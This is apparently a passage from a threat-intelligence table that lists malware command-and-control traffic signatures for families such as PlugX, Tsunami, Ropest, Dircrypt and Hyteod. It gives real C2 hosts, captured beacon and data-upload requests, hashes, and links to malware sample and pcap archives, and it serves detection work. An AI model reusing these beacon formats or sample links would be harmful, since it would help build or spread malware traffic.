348 | 2015-02-08 | APT | PlugX / Korplug / Gulpix | POST | /update?id= | /update?id= | POST /update?id=000f6b50 HTTP/1.1 Accept: */ X-Session: X-Status: X-Size: 61456 X-Sn: 1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR1.0.3705) Host: exchange.likescandy.com Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache - | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.1; .NET CLR 1.1.4322; .NET CLR1.0.3705) | 80 | 00fdb6ad7345c0912ea9d2fa4c49950e | http://blog.cassidiancybersecurity.com/post/2014/01/plugx-some-uncovered-points.html | http://bit.ly/aptsamples | |||||
349 | 2015-02-09 | ADV | PUP SelfInstall | POST | /off/mundo /tid/mundo http://interact.appclick.co/api/values/count | /mundo | POST /off/mundo HTTP/1.1 Content-Type: application/json; charset=utf-8 Accept: application/json; installerversion: 1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) Host: 2-vinstaller.com Content-Length: 606 Cache-Control: no-cache {"Content":"Frs.<long string> / HTTP/1.1 Content-Type: application/json; charset=utf-8 Accept: application/json; installerversion: 1 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) Host: 2-vinstaller.com Content-Length: 2930 Cache-Control: no-cache {"Content":"Frsjo<long string> | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1) | 9f26de41c7520929ea4f4f7e61abe1a6 | http://bit.ly/crimesamples | http://bit.ly/crimepcaps | ||||||
350 | 2015-02-09 | CRIME | Linux Tsunami DDoS bot | POST | / | / | GET /%s HTTP/1.0 Connection: Keep-Alive User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686) | Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686) | 80 | bc8134f3eb3f1d4c19a98fc1eedce533 | http://bit.ly/crimesamples | ||||||
351 | 2015-02-09 | CRIME | Scudy Worm | GET | <p> /online.php?c=dGVxdWlsYWJvb21ib29t&u =amFuZXR0ZWRvZQ%3D %3D&v =1&s=74642e 421f40ff08ff4f 2cffff6d1155& p=MTAuMC4yLjE1&t=1&hi=1ewck5fk4e <p> /en/us/defualt.aspx | <p> /online.php?c= <p> /en/us/defualt.aspx | GET /online.php?c=dGVxdWlsYWJvb21ib29t&u=amFuZXR0ZWRvZQ%3D%3D&v=1&s=74642e421f40ff08ff4f2cffff6d1155&p=MTAuMC4yLjE1&t=1&hi=1ewck5fk4e HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; ) Accept: */* Host: theworldnews.byethost5.com | Mozilla/4.0 (compatible; ) | 80 | http://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/worm_scudy.sma | |||||||
352 | 2015-02-12 | CRIME | Trojan Ropest | GET | /pgt/?ver=1.3.3753&id=125&r=4834765&os=6.2|2|11.0.9600.17631&res=4|3984|359&f=1 | /pgt/?ver= | GET /pgt/?ver=1.3.3753&id=125&r=4834765&os=6.2|2|11.0.9600.17631&res=4|3984|359&f=1 HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-mfe-ipt, */* Accept-Language: en-US Accept-Asterope: true User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; Trident/7.0; rv:11.0) like Gecko UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 89.144.2.20:8080 Connection: Keep-Alive | Accept-Asterope: true User-Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64; Trident/7.0; rv:11.0) like Gecko | http://stopmalvertising.com/malware-reports/analysis-of-asterope/network-activity.html | ||||||||
353 | 5/24/2015 | CRIME | Dircrypt.A | POST | <p> / | <p> / | POST / HTTP/1.1 Host: gowfrfmxojdqvh.com User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE) Content-Type: multipart/form-data; boundary=zwAtguAEVnxnhrVRyhtZ Content-Length: 100 Accept-Language: en-us Accept: text/html, application/xml;q=0.9, application/xhtml+xml;q=0.9, image/png, image/jpeg, image/gif, image/x-xbitmap, *\\*;q=0.1 Accept-Charset: utf-8, utf-16;q=0.6, *;q=0.1 Pragma: no-cache Connection: close | Mozilla/4.0 (compatible; MSIE 7.0; .NET4.0E; Media Center PC 6.0; MASE) | 80 | https://www.virustotal.com/en/file/c795d79747b3bd0dbece3212c1653269e763dcb3032c29469a4caef50740fab5/analysis/ | |||||||
354 | 5/24/2015 | MOBILE | Android Proxy | POST | /proxy/log.php?id=<gmailid@gmail.com | /proxy/log.php?id= | POST /proxy/log.php?id=<gmailid@gmail.com HTTP/1.1 | 80 | http://b0n1.blogspot.com/2015/04/android-trojan-spy-goes-2-years.html?spref=tw | http://contagiominidump.blogspot.com/2015/05/android-proxy-trojan-sample.html | |||||||
355 | 5/24/2015 | CRIME | Hyteod / Dynamer | POST | /upload.php | /upload.php | POST http://b14-mini.ru/upload.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: b14-mini.ru Content-Length: 256 Pragma: no-cache JG1G3pM7VlUrVGbXKRo8T4XCWR2ZZrtOts4Xd7zMEx35yLhp0qrtioTY61cPiNwNLl0N8jX0Fwsn1t+diJ7BiyxG6yt8yVVroVv/OoZg5XgZfpRbH217epr8OGBf5BKSuypiLtNx+mXFJHLmcqwyT1sVVCbr96Eht0QeHCKfqQBy5IiBZ8PkB3dlRLVEaEDRWftEaL+djp0AZ7gB2Jj6pOu6xmr14/LYh7lrbBTVsEbG6CC3+Cb0RR2n4El9YwBG | Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko | 80 | Fiesta EK Payload | fd0ff4992247bbcc2bde6379e10c1499 | https://www.virustotal.com/en/file/e969060815fbdcba6d2ff34dc8f38821454b3cc473e023a2fe3912f150ff6d3b/analysis/ <p> https://blog.malwarebytes.org/exploits-2/2015/05/fiesta-ek-wreaks-havoc-on-popular-torrent-site/ | http://www.mediafire.com/download/0sc3fuaofpldpp8/Hyteod_Dynamer-samp.zip | http://www.mediafire.com/download/idd20ndgrkon4l2/BIN_fd0ff4992247bbcc2bde6379e10c1499_Hyteod-pcap.zip | d:\YuIC\pBmMYPSq\raSsKqliUnwMVBOiIVMJPVyMjYlj\QIWWDJyFoALsJmZgQTUmT\zoqpFWvG\eysOgnVB\oxW\Uhk\SDhdCpa\cAJJvprDKokHgyixaghSQof.pdb |